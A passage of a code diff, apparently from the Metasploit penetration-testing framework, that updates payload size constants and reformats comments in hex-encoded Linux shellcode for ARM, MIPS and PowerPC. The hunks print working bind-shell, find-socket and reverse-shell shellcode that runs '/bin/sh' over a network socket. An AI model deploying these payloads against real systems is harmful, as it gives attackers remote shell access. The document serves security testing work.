"\xb0\x3b" + # movb $0x3b,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 967896
|
||||
CachedSize = 968136
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 967896
|
||||
CachedSize = 968136
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 967896
|
||||
CachedSize = 968136
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 902868
|
||||
CachedSize = 902904
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 902868
|
||||
CachedSize = 902904
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 902868
|
||||
CachedSize = 902904
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -41,74 +41,74 @@ module MetasploitModule
|
|||
|
||||
payload =
|
||||
# turning on thumb mode
|
||||
"\xe2\x8f\x60\x01" +# add r6, pc, #1 #
|
||||
"\xe1\x2f\xff\x16" +# bx r6 #
|
||||
"\xe2\x8f\x60\x01" + # add r6, pc, #1 #
|
||||
"\xe1\x2f\xff\x16" + # bx r6 #
|
||||
|
||||
# thumb mode on
|
||||
# socket(2,1,0)
|
||||
"\x1a\x92" +# sub r2, r2, r2 #
|
||||
"\x1c\x51" +# add r1, r2, #1 #
|
||||
"\x1c\x90" +# add r0, r2, #2 #
|
||||
"\x02\x0f" +# lsl r7, r1, #8 #
|
||||
"\x37\x19" +# add r7, r7, #0x19 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x06" +# mov r6, r0 #
|
||||
"\x1a\x92" + # sub r2, r2, r2 #
|
||||
"\x1c\x51" + # add r1, r2, #1 #
|
||||
"\x1c\x90" + # add r0, r2, #2 #
|
||||
"\x02\x0f" + # lsl r7, r1, #8 #
|
||||
"\x37\x19" + # add r7, r7, #0x19 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x06" + # mov r6, r0 #
|
||||
|
||||
# bind()
|
||||
"\x22\x02" +# mov r2, #2 #
|
||||
"\x02\x12" +# lsl r2, r2, #8 #
|
||||
"\x32"+bytehigh +# add r2, r2, #0xXX #
|
||||
"\x02\x12" +# lsl r2, r2, #8 #
|
||||
"\x32"+bytelow +# add r2, r2, #0xXX #
|
||||
"\x1a\xdb" +# sub r3, r3, r3 #
|
||||
"\x1b\x24" +# sub r4, r4, r4 #
|
||||
"\x1b\x6d" +# sub r5, r5, r5 #
|
||||
"\x46\x69" +# mov r1, sp #
|
||||
"\xc1\x3c" +# stm r1!, {r2-r5} #
|
||||
"\x39\x10" +# sub r1, #0x10 #
|
||||
"\x22\x10" +# mov r2, #16 #
|
||||
"\x37\x01" +# add r7, r7, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x22\x02" + # mov r2, #2 #
|
||||
"\x02\x12" + # lsl r2, r2, #8 #
|
||||
"\x32"+bytehigh + # add r2, r2, #0xXX #
|
||||
"\x02\x12" + # lsl r2, r2, #8 #
|
||||
"\x32"+bytelow + # add r2, r2, #0xXX #
|
||||
"\x1a\xdb" + # sub r3, r3, r3 #
|
||||
"\x1b\x24" + # sub r4, r4, r4 #
|
||||
"\x1b\x6d" + # sub r5, r5, r5 #
|
||||
"\x46\x69" + # mov r1, sp #
|
||||
"\xc1\x3c" + # stm r1!, {r2-r5} #
|
||||
"\x39\x10" + # sub r1, #0x10 #
|
||||
"\x22\x10" + # mov r2, #16 #
|
||||
"\x37\x01" + # add r7, r7, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# listen()
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x1a\x49" +# sub r1, r1, r1 #
|
||||
"\x37\x02" +# add r7, r7, #2 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x1a\x49" + # sub r1, r1, r1 #
|
||||
"\x37\x02" + # add r7, r7, #2 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# accept()
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x1a\x92" +# sub r2, r2, r2 #
|
||||
"\x37\x01" +# add r7, r7, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x06" +# mov r6, r0 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x1a\x92" + # sub r2, r2, r2 #
|
||||
"\x37\x01" + # add r7, r7, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x06" + # mov r6, r0 #
|
||||
|
||||
# dup2()
|
||||
"\x1a\x49" +# sub r1, r1, r1 #
|
||||
"\x27\x3f" +# mov r7, #63 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x31\x01" +# add r1, r1, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1c\x30" +# mov r0, r6 #
|
||||
"\x31\x01" +# add r1, r1, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1a\x49" + # sub r1, r1, r1 #
|
||||
"\x27\x3f" + # mov r7, #63 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x31\x01" + # add r1, r1, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
"\x1c\x30" + # mov r0, r6 #
|
||||
"\x31\x01" + # add r1, r1, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# execve()
|
||||
"\x1a\x92" +# sub r2, r2, r2 #
|
||||
"\x46\x78" +# mov r0, pc #
|
||||
"\x30\x12" +# add r0, #18 #
|
||||
"\x92\x02" +# str r2, [sp, #8] #
|
||||
"\x90\x01" +# str r0, [sp, #4] #
|
||||
"\xa9\x01" +# add r1, sp, #4 #
|
||||
"\x27\x0b" +# mov r7, #11 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1a\x92" + # sub r2, r2, r2 #
|
||||
"\x46\x78" + # mov r0, pc #
|
||||
"\x30\x12" + # add r0, #18 #
|
||||
"\x92\x02" + # str r2, [sp, #8] #
|
||||
"\x90\x01" + # str r0, [sp, #4] #
|
||||
"\xa9\x01" + # add r1, sp, #4 #
|
||||
"\x27\x0b" + # mov r7, #11 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
|
||||
# exit()
|
||||
"\x1b\x24" +# sub r4, r4, r4 #
|
||||
"\x1c\x20" +# mov r0, r4 #
|
||||
"\x27\x01" +# mov r7, #1 #
|
||||
"\xdf\x01" +# svc 1 #
|
||||
"\x1b\x24" + # sub r4, r4, r4 #
|
||||
"\x1c\x20" + # mov r0, r4 #
|
||||
"\x27\x01" + # mov r7, #1 #
|
||||
"\xdf\x01" + # svc 1 #
|
||||
cmd
|
||||
end
|
||||
end
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 903216
|
||||
CachedSize = 903252
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 903216
|
||||
CachedSize = 903252
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 903216
|
||||
CachedSize = 903252
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1388224
|
||||
CachedSize = 1388296
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1388224
|
||||
CachedSize = 1388296
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1388224
|
||||
CachedSize = 1388296
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1284772
|
||||
CachedSize = 1284844
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1284772
|
||||
CachedSize = 1284844
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1284772
|
||||
CachedSize = 1284844
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1286264
|
||||
CachedSize = 1286336
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1286264
|
||||
CachedSize = 1286336
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1286264
|
||||
CachedSize = 1286336
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -74,7 +74,7 @@ module MetasploitModule
|
|||
port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
|
||||
"\xe4\xff\xae\xaf" + # sw t6,-28(sp)
|
||||
host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
|
||||
host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
|
||||
host[0..1].pack("C2") + "\xce\x35" + # ori t6,t6,0x101
|
||||
"\xe6\xff\xae\xaf" + # sw t6,-26(sp)
|
||||
"\xe2\xff\xa5\x27" + # addiu a1,sp,-30
|
||||
"\xef\xff\x0c\x24" + # li t4,-17
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1060824
|
||||
CachedSize = 1060864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1060824
|
||||
CachedSize = 1060864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 1060824
|
||||
CachedSize = 1060864
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -32,60 +32,60 @@ module MetasploitModule
|
|||
'LPORT' => [ 58, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" +# lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" +# mr r22,r1 #
|
||||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x75\x1b\x78" +# mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" +# mr r3,r21 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" + # lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" + # mr r22,r1 #
|
||||
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x75\x1b\x78" + # mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" + # mr r3,r21 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <bndsockcode+148> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode+172> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,47 +32,47 @@ module MetasploitModule
|
|||
'CPORT' => [ 86, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" +# addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x05" +# addi r1,r1,-507 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> #
|
||||
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" +# mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" + # addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x05" + # addi r1,r1,-507 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" + # bne+ <fndsockcode+40> #
|
||||
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" + # mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <fndsockcode+96> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode+120> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -33,50 +33,50 @@ module MetasploitModule
|
|||
'LPORT' => [ 62, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" +# li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" +# mr r21,r1 #
|
||||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
|
||||
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" +# mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
|
||||
